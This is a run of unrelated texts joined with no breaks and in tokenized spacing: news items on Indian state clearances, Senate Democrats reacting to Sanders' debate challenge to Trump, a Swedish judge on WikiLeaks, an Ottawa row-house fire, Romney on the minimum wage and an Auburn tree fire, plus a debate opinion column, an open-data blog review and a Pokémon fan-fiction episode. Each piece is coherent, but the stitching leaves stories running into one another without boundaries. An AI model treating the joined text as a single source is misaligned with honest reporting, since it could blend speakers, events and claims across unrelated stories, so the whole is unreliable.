The Gujarat Pollution Control Board 's e-governance project helps the industry in getting online clearances . The number of applications process increased six times from 1,500 before the system was put in place to 9,823 now , while the number of inspections have more than doubled to 24,000 and e-returns jumped four times to 12,000 a year .
Rajasthan 's single-window clearance help in processing 86 firms of 11 departments online while a similar process in Punjab clears a proposal within 3-4 weeks .
States that have streamlined clearances and improved governance have benefited from higher growth Maharashtra and Gujarat have grown by over 9 % between 2005-06 and 2012-13 even as the overall GDP growth averaged 7.6 % .
For some Democrats , Bernie Sanders ' latest gambit — challenging Donald Trump to a debate to cap all debates — is the last straw .
“ Bullshit , ” said Sen. Joe Manchin of West Virginia . “ That confirms what we 've been saying . Why would you expect Bernie should be considerate or be nice or be working to bring everyone together ? Why ? He 's not a Democrat . ”
Story Continued Below
The party 's frustrations are boiling over with Sanders as the primary season winds down : Namely that Sanders seems unwilling or unable to admit that Hillary Clinton is on course for the nomination . The ire toward Sanders began earlier this year among the loudest Democratic cheerleaders for Clinton — and now it 's seeping into nearly the entire Senate Democratic caucus .
Lawmakers reacted with puzzlement , sarcasm and barely veiled anger as Sanders ' campaign and Trump himself played up an event that would exclude Democratic front-runner Hillary Clinton .
“ I do n't know why he would do that . I think it 's time to start to winding down the primary , ” said Sen. Gary Peters ( D-Mich. ) . “ It 's time to move on . ”
“ It 's peculiar , ” said Sen. Sherrod Brown ( D-Ohio ) . “ It 's all about Bernie trying to get the advantage in California . It 's not going to work . ”
A minority of Democratic lawmakers , though , said they 'd be fine with Sanders going toe-to-toe with Trump on TV , if only to unmask the Republican nominee as a false advocate for working people . They said Trump was never sufficiently challenged on his prescriptions for the economy during the primary , with all the attention on his insults .
“ The more Donald Trump gets exposed in the context of public policy , the better it is for our country , ” said Sen. Claire McCaskill of Missouri .
“ It 's a good idea , ” said Sen. Maria Cantwell of Washington state . “ The economic future of our country needs to be debated . ”
Senate Democrats have been shadow-boxing with Sanders for months , praising the movement he has built but gently reminding him that Clinton is the favorite and that math is not on Sanders ' side . But Sanders has been defiant , spurning requests for apologies after his supporters erupted at Nevada 's Democratic Convention earlier this month and stoking the debate with Trump .
Sanders ' Twitter account has been hyping the proposed debate , an idea his campaign initiated by planting a question with Jimmy Kimmel Wednesday night when Trump was a guest . Surrogates dared Trump not to “ chicken out . ”
Trump , unsurprisingly , has sent conflicting signals — at first saying he 'd do it , then calling that a joke , and finally on Thursday saying he 'd participate only if the event raised at least $ 10 million for charity .
Left out of the conversation altogether , of course , is Clinton , who recently declined to debate Sanders ahead of California 's June 7 primary . With no Democratic debate , Sanders seems to be looking for any way to keep up his campaign 's momentum .
A showdown between the fiery senator and the bombastic real estate mogul would be must-watch TV and possibly the most-hyped media spectacle of this crazy campaign year .
On Thursday , the potential Sanders-Trump match-up was all the chatter of the political class . Democrats do n't think Trump will go through with it .
“ I mean . Why ? It would draw attention to Bernie . I can understand Bernie wanting to do it . But why would Donald want to do it ? ” asked a perplexed Sen. Bill Nelson ( D-Fla. ) .
Added a Democratic senator : “ It 's a stunt … Trump wo n't go through with it , and Bernie has literally nothing to lose . ”
The tense relations between Sanders and fellow members of the Senate Democratic Caucus also raises questions as to what his interactions will be like once he returns to the Senate .
Asked during a brief interview this week at the Capitol when her husband would return to the Senate , Jane Sanders responded , “ After the 8th. ” But she quickly backtracked and said , “ I do n't know. ” California and a host of other states are holding their contests on June 7 . A Sanders campaign spokesman did not immediately return a request for comment to clarify Jane Sanders ' comments .
As for the possible debate , Sanders ' lone surrogate in the Senate , Jeff Merkley of Oregon , was unaware his candidate had challenged Trump . But after a reporter described the sequence of events , Merkley said he was “ looking forward ” to the two men sharing the stage .
“ Here is Trump , who is posing as a defender of working Americans and he has n't done one thing for working Americans his entire lifetime , ” Merkley said . “ It 'd be a very interesting and worthwhile conversation . ”
Other Democrats , frustrated by the continued sniping within the party as Trump sets his sights on Clinton , said the debate ploy smelled of desperation on Sanders ' part .
“ What he 's trying to do , '' said Sen. Dianne Feinstein ( D-Calif. ) , `` is brought attention to himself . ''
A top Swedish judge has defended the release of classified information by WikiLeaks , pointing out the case against Assange has turned into a legal “ mess . ”
`` It should never be a crime to make known crime of a state , '' Stefan Lindskog told the audience at a public lecture he gave at Adelaide University , according to Australian Associated Press .
The judge , who is one of the 16 justices working for the Supreme Court of Sweden , revealed an extraordinary amount of detail on Assange 's sexual assault case , despite not sitting on it .
The official also indicated that the courts may rule against sending the WikiLeaks founder to the US due to some conditions of the existing extradition treaty between the two countries .
`` Extradition shall not be granted when alleged crimes [ are ] military or political in nature , '' Lindskog stressed .
Moreover , according to the judge , it was debatable whether Assange would have committed a crime under Swedish law .
`` What is classified under US law is probably not classified under Swedish law , and enemies to the US may not be enemies to Sweden , '' AAP quoted the official as saying .
Lindskog added that extensive media coverage of the case has entailed the public distrust in the legal system .
`` I think it is a mess , '' he said .
Finally , the judge supported the American soldier Bradley Manning , who provided some of the classified information to WikiLeaks . Lindskog said he hoped Manning would go through a fair trial , saying that the release of classified information was for the benefit of mankind .
Prior to the speech , Assange condemned Lindskog 's decision to speak in Australia , calling it `` absolutely outrageous . ''
The 41-year-old whistleblower , an Australian citizen , has spent nine months in London 's Ecuadorian embassy , after claiming asylum to avoid extradition to Sweden , where he is wanted for questioning on sexual assault allegations .
Assange fears that once in Sweden , he could be extradited to America where , according to his lawyers , he is most likely to face trial and possibly even the death penalty for the release of thousands of classified US diplomatic cables , some of them about the wars in Iraq and Afghanistan .
A `` carelessly discarded '' cigarette is likely to blame for displacing 20 people and causing about $ 450,000 in damage after an early morning fire in the Centretown area , Ottawa Fire Services say .
Emergency crews say residents at 69 Raymond St. , a row house , called firefighters at 5 a.m. to say they were evacuating their home . A second person also called 911 after they saw flames coming from the roof while passing the area on Highway 417 .
Everyone made it out safely but the flames quickly burned through the roof , firefighters said .
Ottawa Fire crews operating at at 2-Alarm fire at 69 Raymond Street . Fire is in multi-door row . All occupants are safe . < a href= '' https : //t.co/PthN0GlsQl '' > pic.twitter.com/PthN0GlsQl < /a > — @ OFSFirePhoto
4 children , 16 adults displaced
Crews had to open up neighbouring units to stop the flames from spreading .
The fire was under control by 7:45 a.m .
3 of 6 residences are damaged however hydro has been cut off to all 6 row houses for time being . < a href= '' https : //twitter.com/hashtag/ottnews ? src=hash '' > # ottnews < /a > — @ MessierOnFire
Investigations officer Marc Messier said in five families , four children and 16 adults , were forced out of their homes .
Three of them will be able to return in a few days when the heat and hydro is turned back on . The other two will have to wait until their damaged units are repaired , Messier said .
`` The witness did mention he had been smoking and the way they explained that they were discarding their cigarettes gives us every reason to believe that this is what caused the fire , '' he said .
It was either him or Marco Rubio , and I think Paul came out on top last night . He was calm and eloquent . He made his points forcefully and emphasized the uniqueness of his libertarian-ish convictions . He skewered the other candidates without resorting to cheap personal attacks . He looked good .
He also was n't trying to convince anyone that ISIS agents were at that very moment slinking past the New York Port Authority . This is what pushed Paul over the top for me . Rubio 's constant invocation of the terrorist group got annoying . A quick Control-F search of the transcript reveals that he mentioned “ ISIS ” 15 times , far more than any other candidate , while Paul only mentioned it five times . If the moderators had asked salt or pepper , Rubio would have found a way to shoehorn the caliphate into his answer . The terrorists can produce their own PR , thank you very much .
Perhaps Paul 's best moment came when he threw a bomb over the issue of immigration :
What is particularly insulting , though , is that he is the king of saying , “ you 're for amnesty. ” Everybody 's for amnesty except for Ted Cruz . But it 's a falseness , and that 's an authenticity problem — that everybody he knows is not as perfect as him because we 're all for amnesty . I was for legalization . I think , frankly , if you have border security , you can have legalization . So was Ted , but now he says it was n't so . That 's not true .
This was a major shot not just at Ted Cruz , but at the GOP 's endless dick-measuring contest over immigration—the talk show hosts who do nothing but scream “ AMNESTY ! ” into the microphone for three hours , the politicians who cynically exploit fear of migrants back home . “ I think , frankly , if you have border security , you can have legalization. ” It was refreshing to hear that uttered at a Republican debate . Rubio seemed to like Paul 's attack too , citing it both during the debate and in a subsequent interview with Sean Hannity .
Rubio wore his kids gloves with Paul last night . The two men criticized each other , but there were no shouting matches over military spending or “ isolationism. ” Instead they seemed to be double-teaming Ted Cruz , who had his worst outing of the campaign season . Paul was particularly aggressive against the Texas senator , bashing him for his opportunism over immigration , government surveillance , and the Federal Reserve . After being called out for missing a vote on legislation to audit the Fed , Cruz lamely responded that he would sign the bill into law as president . Any hope of Cruz peeling off a sizable chunk of libertarian voters seemed to crash into a brick wall .
Chris Christie : has a once celebrated reformer ever sounded so tired ? His insistence that candidates who attend a debate should refrain from debating because that 's what they do in Washington is thoroughly unconvincing . Worse is his contention that voters should support him because he would rather do things than talk about them . Has anyone informed him that an energetic executive is n't compatible with conservatism ? Christie was loquacious as always last night , but he 's become so repetitive that surely those listening in their cars were momentarily tempted to drive off a bridge when they heard his voice . How appropriate . It was Jeb Bush who had the best performance of the establishment candidates last night . At last , he managed to hold his own in a clash with Rubio .
This is where self-satisfied cynics and libertarian contrarians interject . “ In fact , ” they say , “ the real winner of last night 's debate was Donald Trump ” —here they pause to smirk at their keyboards— ” because he did n't participate in such a base and demeaning spectacle. ” This is nonsense . The debate pulled in four times as many viewers as Trump 's sideshow . It scored at least five times the ratings that Trump 's campaign predicted . It was more watched than the last debate , which featured Trump . And given that the garrulous gasbag has n't won a debate in months , his supporters were n't going to be impacted by his performance either way . This was about Trump 's opponents finally holding a substantive exchange over the issues . In that it was a success .
And no one was more successful than Rand Paul . I leave you with his answer over criminal justice reform , which showed sensitivity to the African-American community and acknowledged there were two sides to the Ferguson protests . After that , we 'll return to your regularly scheduled programming of fearmongering and immigrant bashing .
Mitt Romney ran for president in 2008 and 2012 . ( Photo : Alex Wong , Getty Images )
Mitt Romney , the former Massachusetts governor and 2012 Republican presidential nominee , said Friday he believes the nation should raise the minimum wage , breaking from House Republicans who have resisted an increase .
`` I part company with many of the conservatives in my party on the issue of the minimum wage . I think we ought to raise it , '' Romney said during an interview on MSNBC 's Morning Joe .
Romney said raising the minimum wage is part of a message the party needs to reinforce in outreach to black and Hispanic voters . `` Our party is all about more jobs and better pay , '' Romney said , while under Democratic control , income inequality has gotten worse .
Democrats have been pushing for an increase in the federal minimum wage to $ 10.10 as part of an election-year agenda to emphasize the needs of working and middle-class Americans . Senate Republicans blocked a vote on a minimum wage bill last week , and House Republicans have said they have no plan to hold a vote on a minimum wage bill .
MORE : Senate fails to advance minimum-wage hike
Romney had been a supporter of raising the minimum wage prior to his presidential bid , but in March 2012 in the face of conservative opposition , he said `` there 's probably not a need to raise the minimum wage . ''
Romney also said during Friday 's interview that he does not plan to run for president again , despite his recently increased public profile .
`` I 'm not running for president in 2016 , '' Romney said . Republicans ' `` best prospects for getting back the White House are with someone who has not run twice before , as I have . ''
Read or Share this story : http : //usat.ly/1kXbkEj
Written by Alisha Green
It was another year full of encouraging news on the open data front in states and municipalities across the country . New open data policies were approved in municipalities of all sizes from coast to coast , existing open data programs matured and sparked new innovations , and there were numerous other open government wins as a result of advocacy efforts .
Here 's a look back at the year 's highlights :
A growing number of strong open data policies
2013 was a landmark year for the adoption of open data policies , and 2014 built on that momentum . There are now 50 open data policies at the state and municipal level across the country . There were 19 new state and municipal policies adopted this year , and four existing open data policies were updated and improved . All five of the largest cities in the U.S. now have open data policies , and small and mid-sized cities are increasingly joining the movement for open data . Bloomington , Ill. , with a population of fewer than 78,000 ; Jackson Mich. , with a population under 34,000 ; and Williamsville , N.Y. , with a population of fewer than 6,000 , all adopted open data policies in 2014 , showing that smaller communities can and should embrace the benefits open data can bring .
The communities adopting open data are finding ways to build on the success of those who came before them in this space . Boston 's new open data policy , for example , encourages the Chief Information Officer overseeing implementation to work with people across departments and issue additional guidance , building a strong foundation for moving forward with buy-in across government . Pittsburgh 's new open data policy follows more than half of the best practices for open data .
Even governments with open data policies already in place are seizing the opportunity to iterate and make improvements . Washington , D.C. , the first local government we identified as having an open data policy , updated its policy this year with an executive directive from the mayor . The city made several important improvements , and though it still has plenty of room for growth , we hope it will continue to iterate its policy to include best practices .
Other places have worked on updating their guidance supporting existing open data policies . NYC updated its open data plan that complements the policy , committing to releasing more data but also prompting some questions . Montgomery County , Md. , released an implementation plan that outlines the prioritization process used for releasing datasets and shares insights on the steps taken to complete an inventory of datasets . Philadelphia showed its open data growth , too , with the release of a new Strategic Plan outlining how it will approach its inventory and prioritization process , accompanied by a revamped public-facing method for tracking all of the progress .
Widespread transparency wins
There has been open government progress this year at the state and municipal level beyond open data policies , too . New York City is beating the feds to modernizing transparency by putting public information online . We looked into Philadelphia 's updated lobbying portal and found improvements since our last review that are resulting in more open data . We kept a watchful eye on California 's vote on the public records law , which came after a failed attempt last year to roll back public records requirements at the municipal level . The approval of the amendment to the state 's Constitution means municipalities will have to continue to comply with the state 's public records law . That change could open the door for broad open data movement across the state , too , if open data is written into the public records law .
There is certainly no lack of momentum among California groups hoping to see the state improve its open data . We joined a coalition of groups calling for open data improvements to California 's influence data portal , Cal-Access . Improvements to that system could help shine more light on campaign finance , lobbying , and ethics disclosures data .
California was n't alone in tackling bad policies this year . In a huge win for transparency , an examination of the openness of executive orders in all 50 states led to a deeper look into the case of the disappearing executive orders in Georgia and , ultimately , the restoration of those orders online .
We also examined limited liability donations and corporate registry access in Texas and Washington , finding that states vary drastically when it comes to how they deal with disclosing information about campaign donations .
Several efforts this year built on work from previous years . We continued our initial exploration of how federal levers might help municipalities be more open with their financial data . We gathered a group of people to ask the federal agency collecting a significant amount of municipal financial data to consider open data best practices after wondering whether the agency could play a role in that openness . We first became interested after receiving an encouraging comment from the agency around open data recommendations .
Federal open data improvements are poised to help with this issue , too . The passage of the DATA Act earlier this year will help improve the transparency of state and municipal grants from the federal government . It 's an important step toward better transparency of state and municipal finances .
Beyond financial data , we explored other specific kinds of open data . We took a look at the progress of open legislative data at all levels of government around the country . Opening up legislative data is helping people access more information about proposed bills and existing law , empowering them to be more informed participants in government processes .
We explored the intersection of open data with other areas that can support open government , too . Our efforts throughout 2014 included advocating for getting serious about protecting access to public emails , describing what the federal government could learn from the state and municipal electronic-filing efforts , looking at the need for updating public records tools to include more open data concepts , exploring the intersection of police accountability and open data , showing how government- and community-run public records portals are helping bring open data concepts to the public records process , examining how proactive release of public records could lower costs , and sharing recommendations for strengthening open meetings with open data .
We took a deep look at the intersection of public records , records management , and open data , including the future of storing and sharing records , addressing the costs of turning public records into open data , the need to balance records management and open data when it comes to liabilities , how good records management helps open data . We pointed out that open data is the next iteration of public records—which means public records advocates and open data advocates should be working together , leveraging their skills , insights , and shared interests to create improvements
Our thought-leadership in all of these areas and beyond has helped share knowledge , inspire advocates , and empower change at the local level around the country .
Building resources to support the movement
Increased open data adoption and improved open government practices have come about through research , advocacy , and the sharing of best practices . Sunlight has developed and continues expanding on a wide variety of resources to help with these efforts .
Education about the benefits of open data is part of what is helping drive forward adoption . Our Impacts of Open Data document highlights the range of potential benefits to government and the public from open data , including increasing transparency , empowering accountability , enhancing efficiency and leading to cost savings , improving service quality , and increasing public participation . The document is also available in Spanish , thanks to the work of Sunlight friend and open government advocate Iris Palma .
Of course , open data policies and programs can not achieve their full potential without being strongly written and implemented . Sunlight 's Open Data Policy Guidelines , originally crafted in 2012 , were revamped this year to help with those processes . The corresponding examples for best practices—including narrative examples and policy language—were expanded to reflect the range of approaches to crafting and implementing strong open data policies . The updated guidelines now include a look at the different kinds of oversight authorities , the need for a balance test to appropriately safeguard sensitive information while releasing as much as possible , prioritization processes for data release , and more .
Building on the foundation of the Guidelines , the Open Data FAQ page answers specific questions about open data policy drafting and implementation , aiming to help the processes be as informed as possible .
To help inspire action and engagement around open data and tools for exploring open data , we crafted a civic toolkit to help engage the next generation of leaders .
The US City Open Data Census , a collaboration between Sunlight , Open Knowledge , and Code for America , is another resource for staying informed about open data around the country . It tracks the technical openness of datasets in cities where a non-government community member has volunteered to do that assessment .
And , of course , we 've been continually updating and expanding resources including the open data map listing all of the U.S. open data policies , the GitHub repository for additional resources , and our Sunlight Cities Tumblr , highlighting fun , important , and innovative open data visualizations and stories from around the country . We even refreshed the hub of our local work to help bring all these resources together and make them easy to find .
Looking ahead
It 's been a great year for open data and open government across the country , and we believe there is always room for improvement . We built upon the great progress made in 2013 to advance open data in states and municipalities of all sizes , helping them craft and implement policies that fit the local context , and we look forward to continuing and growing that work going ahead .
We 're sure 2015 will bring further advances for open data and broader open government wins . There are sure to be more challenges , too , and we 'll be ready to take those on , working with government staff and officials as well as community advocates and stakeholders to bring greater transparency to local governments .
Originally posted on the Sunlight Foundation blog . Reposted here under Creative Commons .
Desert Woes and Exploding Foes
Xsar : Have you seen a Flareon this size possibly alongside an Espeon anytime today ?
Guard : Sorry ma'am , but I do n't recall seeing a Flareon pass through here today .
Xsar sighs .
Guard : However , if you really want to check , the Ticketeer over near the ticket check sees basically every mon that passes through here .
Xsar : Thanks , I 'll do that .
Sam 's surprise letter had brought her to the Twitchopolis Central Train Station in search of the Flareon . It was a quiet evening in the station , and only a handful of mons wandered about to their destinations .
She approached the ticket counter in hopes that they may have some more information on Sam 's whereabouts .
Ticketeer : Welcome to TCTS , how may I help you with tickets today ?
Xsar : Um… I 'm not here for tickets .
Ticketeer : Then what brings you to the ticket counter ? This is n't the information Kiosk ; that desk is back there .
They point to a round desk towards the entrance .
Xsar : I know , but I was told that you see basically every mon that comes through here .
Ticketeer : Did security send you here ?
Xsar nods .
Ticketeer : Of course… they think I 'm a living security camera and that I can do all the heavy lifting for them . I 'm just a ticketeer !
Xsar : Look , I 'm not here to talk job issues , I 'm looking for a missing mon .
Ticketeer : AH , and now bossy too . Let 's just hurry up with it then . Who are you looking for ?
Xsar : I 'm looking for a Flareon ; smaller in size and fluffy . He should have been with an Espeon if my assumptions are correct .
Ticketeer : Espeon ? You probably mean Burrito , correct ?
Xsar : ( The so-called star of the show… ) Yes . Does that mean you saw him ? ?
Ticketeer : Who did n't ? He and another mon , most likely the Flareon that you are looking for , took off on a train to Olden earlier today .
Xsar : Olden… wait-
Her expression turns sour very quickly .
Xsar : Is n't that where the recent attacks on ships been happening lately ? ! ? The ones that have been making headlines in the news ?
Ticketeer : Mmmhmm . It 's also why there have been fewer people at the station as of-
Xsar : I need to get on a train to the port NOW ! ! !
She had gotten close to the counter with her outburst , freaking the Ticketeer out .
Ticketeer : A-ah yes yes , of course ! I should be able to get you one in a jiffy !
The ticketeer reaches back to a large collection of drawers , opening one and pulling a single ticket out of the slot .
Ticketeer : H-here you go , a ticket all for you free of charge !
Xsar quickly grabs the ticket and races off to the trains leaving many mons dazed and confused in her wake .
Ticketeer : ( And just what was her problem ? ! ? )
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -
Burrito : SAM ? ? ? ? ? Sam can you hear me ? ? ? ?
Burrito called out yet again into the desert , and again received no response back .
It had been a good two hours since Sam had taken off into the desert chasing the rock that had taken an item he so desperately needed to get back . Burrito did n't understand it . Some items were very important yes , but you do n't just rush off into the desert unprepared !
At the same time however , he had himself to blame too ; for he had also run out into the desert unprepared , and the heat was already starting to take its toll .
Burrito : Meh… . hahhh… . so hot… . deserts are the worst !
Yelling only sent him into a coughing fit as sand whipped around him .
Burrito : Gaack… ( y-you are in so much trouble when I find you Sam ! )
While not far from the port , the now whipping winds had begun to stir the sands , greatly lowering visibility . It was not a complete blackout , but it was only a precursor to the new sight that only now just caught his attention .
Burrito : ( What… w-what is that ? ! ? )
Before him on the horizon lay a wall of dust and sand , stretching tall and high into the skies .
And it was coming closer .
Burrito : ( I need ... to move , now ! But Xsar would kill me if I- )
He looks back and forth , but is unable to see any real path to go . He coughs again .
Burrito : S-SAM ! ! ! !
Once again , no response .
Burrito : ( So exhausted… .. so tired… need water… where the heck are you Sam ? ! ? ! ? )
But the desert did not listen , no water or Sam was to be found , only sand sand and more sand .
And the sandstorm only grew closer .
Burrito : ( I 'm sorry Xsar… but this is my only choice for now . )
Turning around in the direction he believed the port was , he started to run a fast as he could away from the growing wall of sand . Panting and sweating profusely , he knows that he could n't do this forever . The town had to be close !
...
Ten minutes later , his run had slowed to a walk ; most if not all his energy depleted . No ground had been gained on the sandstorm , if anything it had only kept pace with him .
Burrito : Hah… . hah… . hah… . ( I… give up… )
Falling against a rock , he huddles and braces for the worst . With the heat , sand , and lack of water , his will to stay strong was fading fast . The only thing he could do was weakly watch the Sun above , its rays only mocking him even more so .
Burrito : …
The winds grew fiercer , the sand beginning to pelt his fine coat consistently . Burrito could do nothing as the wall of sand readed to swallow him .
Burrito : ( M .. Mart- )
And it was then when the sand hit .
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -
Sam : Give it back ! ! !
? ? ? : Give what back kid ? This is no place for someone like you , shoo !
Sam : But…
? ? ? 2 : Boss , you have something on your back .
? ? ? : Huh ?
Sam : That's- give it !
? ? ? : Oh oh oh… lookie here . Such an interesting item ! What say you lads ? Do we listen to this chump or teach him a lesson KAPOW style ?
? ? ? 2 : I 'm always up for an ever bigger blast than before !
? ? ? 3 : Yea yea ! KAPOW all night and day !
Sam 's expert chasing skills had miraculously allowed him to follow the tracks all the way to the suspect 's location . Around him was a grand entrance to a mine , filled with carts , pickaxes and a whole lot of minerals and jewels .
His presence at the facility had been quickly noted , and two Geodude had been sent to his location . They were followed by a third , a Graveler , who seemed to be in charge .
Sam : I-i said give it back ! ! !
Despite trying to act tough , he could not hide the obvious signs that he was deathly scared .
One of the Geodude was the first to pick on it .
Geodude 1 : Ohhh , is the kid scared ?
It only made Sam shake even more .
Geodude 2 : Go back home to mommy , this is a place only for grown men !
He received a harsh glare from the Graveler .
Geodude 2 : A-and grown women too !
Geodude 1 : Hah ! One me , zero you !
Geodude : Grr…
Graveler : Quiet you idiots ! Let me do the talking .
Geodude 1 & 2 : Yes ma'am ! !
She returns to the still shaking Flareon trying to keep his brave face .
Graveler : Like a said before…
Around the Graveler 's body , a very faded dark essence begins to glow .
Graveler : ThIS is nO place FoR you ! LeAVe or eLSE ! ! !
She pulls out a set of dynamite from behind her back . Sam 's pupils go microscopic .
Graveler : ThaT 'S beTTer .. go ROLLIN ' home on now KiD .
Slowly but surely , Sam starts to back away from the three intimidating mon .
Geodude 1 : Yea that 's right ! Shoo !
Geodude 2 : Go home and do n't come back !
Sam : N-n… .. ( M-my pendant… )
As much as he wished to strike and quickly get his pendant back , he stood no real chance against 2 rock types with explosives . He could only back away and out of sight . When he was out of sight though , he stopped and kept a single eye on the three from behind a rock .
Geodude 2 : Damn… I wanted to see another KAPOW !
Geodude 1 : Chief 's orders I 'm afraid .
He then looks to the Gravelier .
Geodude 2 : What you reckon you going to do with that item anyway chief ?
She looks over the item in particular . It is orange-coated with a small chain used to attach it to other objects . Upon even closer inspection , the item could be opened , revealing a heartwarming picture of a Persian and a Flareon .
Graveler : …it 's worthless . Trash it .
Geodude 1 : Got it !
She tosses the pendant on the ground for the Geodude to smash .
Geodude 2 : It 's ROLLIN ' Time !
Gathering up spinning speed , the Geodude launches from his spot at the amulet .
Sam : NOOOOOOOOOOOOOOOooooooooooooooooooooooo ! ! ! ! !
The loud scream disorients all three of them , causing the rolling Geodude to crash into the other , missing the Pendant .
Geodude 1 & 2 : Ow OW !
Graveler : I THoughT I told you to LEAve BrAT ! !
He jumps out of his hiding place to face the three mon once more .
Sam : N-no ! I will not leave , that 's my pendant !
Graveler : And WhaT ? You REALLY think a tiny-little FIre type like you CAN stand against mE ? 5 ' 7 ” , chief WaRDEn of the OldEN MINES ? ! ?
Sam : I-i…
She takes a step forward , pulling out a stick of dynamite .
5 ' 7 ” : I was mercifuL to yOu beFOre , only beCaUSe you are a kid . But YOU did not leave , and I ReCKON I must teach you a lesson in ROLLIN !
She chucks the stick into the air before winding up and launching a speedy rollout at Sam .
Sam : N-ngahhh !
He dodges shakily out of the way , the giant mass of rock only just missing him by inches .
5 ' 7 ” : And the ReTuRN !
She curves around and slams Sam in the back , knocking him forward .
Sam : O-owowowowowow… .
5 ' 7 ” : And now ! -
She jumps out of her rollout to catch the stick of dynamite naturally . Pulling out a small match , she lights a flame on the end of the fuse before chucking it at Sam .
5 ' 7 ” : Say KAPOW for mE will ya ' ? I 'll take caRe of this little ‘ GiFt ” of yours ! Like eVen it is one WAHAHAHA ! ! ! !
Sam did n't have much time to think , as he was seconds from being KAPOW'ed , but it was those words mocking his gift that set ablaze the anger in the Flareon 's heart…
…
…
Sam : RUAAAAAAAAAAAGH ! ! ! ! ! ! ! ! ! ! !
With effortless rage , he grabs the stick mid-toss , preventing it from exploding instantly on him .
5 ' 7 ” : W-what ? ! ?
Taking advantage of the shock . he quickly dashes forward into the Warden , pushing the Graveler back into the two stunned Geodude .
Sam : Now how about you take care of this gift of yours !
Leaping off the Graveler , Sam throws the stick right back at her…
KAPOW ! ! !
The explosion is immense and knocks Sam off his feet . A few rocks come tumbling down from the ceiling , separating him from the other mons . Silence sets in .
Sam : What- w-what did I just do ?
He looks around the scene shocked more than anything until a small shiny object grabs his attention .
Sam The pendant !
Sam picks it up and looks for any damage . Other than a few minor scratches , it is in good condition . He opens the compartment to see the same warming picture looking back at him .
He breathes a sigh of relief… before beginning to worry again .
Sam : Um… n-now how do I get back ?
Looking back at the entrance of the mines , there is nothing but a wall of sand that could be seen from his position . Moving five feet let alone the trip back to the town would be impossible .
He was stuck there , in yet another 'box ' .
Sam : ( O-oh no… nononononono ! )
Feeling helpless and lost without anyone there to calm him , he was unable to contain the shakes once more .
Sam : ( Burr- )
It was then he remembered the stupid action he made . Burrito had tried to follow him into the desert , and now he might be lost out there .
It was his fault .
Sam : No… .. n-no… . nononononononononono ! Burrito ! ! ! ! ! !
His yells far on deaf ears ; for no mon was around or nearby to hear aside from the howling sand that licked oh so near ...
-- -- -- -- -- -- -- -- -- -- -- -- -- -
Trumprava glided swifty over the sandy terrain . Her eyes were locked to the ground in search of any body resembling either Burrito or Sam . The sandstorm had no effect on her , instead actually feeling quite good on her skin .
She was n't taking the mood in stride however .
Trumprava : ( Fools ! Why did they just rush out with no prior preparation or warning ! )
Pumping her wings at bug speed again , she continued to search for the two missing mon .
Trumprava : ( Now I have to clean up the mess… again . )
She passed by a rock , then another , yet still no sign of either of the two . Onwards she continued .
Trumprava : ( This is n't working… how about- )
Landing softly on the ground , Trumpava closes her eyes and begins to feel for unnatural vibrations in the air and on the ground .
Nothing… Nothing… Nothing…
Trumprava : ( Bingo ! )
She had caught a wavelength of a small mon , not too far away from her . Its exposed position and weak power induced urgency into Trumprava 's route .
…
…
…
Trumprava : ( There ! )
Below her alongside a small rock lay a sandy and beat Espeon . He hid bundle style , but was unable to keep out all of the elements .
She landed beside him and made checks to his vitals .
Trumprava : ( Still breathing… but very weak . I need to get him out of this storm and fast ! Looks like I will end up be taking a trip to the mines after all… )
She faced a problem however when she attempted to pick Burrito up .
Trumpava : ( Offff ! Did n't know Mr Popular was so heavy for his size . He 's gon na get it from me for this when he wakes up ! )
It took a few tries to finally get some lift between Burrito and the ground , but it was not too long before they were airborne again , and in-route to the mines .
Trumprava : ( Just hang on a few more minutes Burrito… and then everything will be okay… . )
END ( Episode 13 )
All Herron Taylor wanted was to take a picture .
As the Auburn junior and her boyfriend , Brendan McGowan , sat beside the oak tree on W. Magnolia Ave. at Toomer 's Corner shortly after midnight on Sunday , all was right with the world .
`` We had rolled the tree earlier in the night and we had hung out downtown for a little bit longer and we were leaving and we were like 'hey look , let 's get a picture in front of the tree , ' '' Taylor said . `` It was so pretty completely covered in white . ''
As a friend backed up to take their picture , he saw a man set some of the toilet paper hanging from the tree on fire behind McGowan and Taylor , who first went towards the fire as another bystander attempted to grab at the flaming toilet paper while McGowan pointed out the man responsible .
Who is Jochen Wiest ? Information about man accused of setting tree fire at Toomer 's Corner Information about Jochen Wiest , the man accused of setting the fire to the W. Magnolia Ave. oak tree at Toomer 's Corner in Auburn following Saturday 's game between Auburn and LSU .
`` We saw him kind of wandering in underneath the tree , he was alone , wandering in the toilet paper , '' McGowan said . `` As we turned around to take the picture the guy did n't get even the picture . ... He went from the tree after lighting it back to his group of friends like nothing had happened , watching it go up in flame . ''
What Taylor did next has Auburn fans far and wide calling her a hero because with all due respect to Auburn defensive coordinator Kevin Steele , Taylor made the biggest stop in Auburn that day .
Surveillance footage shows the Mountain Brook native hurry towards Jochen Wiest , who is facing charges of felony first-degree criminal mischief and desecration of a venerable object for allegedly setting the fire , and confront him .
`` I was screaming at him like 'you lit the tree on fire , you lit it on fire , ' '' Taylor said . `` Everyone was more focused on the tree and I had looked at the tree and realized I ca n't do anything about this ; this is out of my control . We saw the guy and he was like , 'oh , no , no . '
`` I was already mad at him , of course -- furious . When he was trying to back away from me , get away , that made me more mad . I was like 'nuh-uh , I 'm going to get you . You can not run away . You 've got to pay for this . ' ... he was putting his hands up like 'whoa , ' kind of freaking out that all this was happening . I think he kind of realized that he messed up pretty bad . ''
Taylor followed Wiest , who she said was wearing an Auburn hat - `` obviously he 's not a true Auburn fan . ... he was n't an LSU fan , '' as he crossed S. College Street and tried to flee the scene .
She filled in the blanks of what happened after they were no longer in frame of the surveillance camera on the northeast side of the intersection .
`` I was running right behind him past ( BBVA ) Compass ( bank ) , that little parking lot right behind there , '' Taylor said . `` I was screaming , 'He lit it on fire , he lit it on fire ' and by that point all downtown was lit up from the tree it was just blazing flames . So everyone knew something bad had happened . When I was saying that all these guys kind of realized ... it hit them . A few guys around me came and tackled him to the ground to hold him down . ''
Wiest went east on Magnolia Ave. towards Moe 's Original Bar B Que before eventually being taken to the ground by bystanders .
McGowan said Wiest was kicked in the face and back by those who had surrounded the 29-year-old , whose mugshot appears to show an abrasion on his nose .
Amy A. Brooks , a woman from Chelsea , told AL.com she and her husband were nearby as Wiest was being confronted and she called police , who arrested him for public intoxication and later charged him with desecration of a venerable object .
Taylor is n't sure where the instinct to go after Wiest came from , but Auburn fans are glad she did .
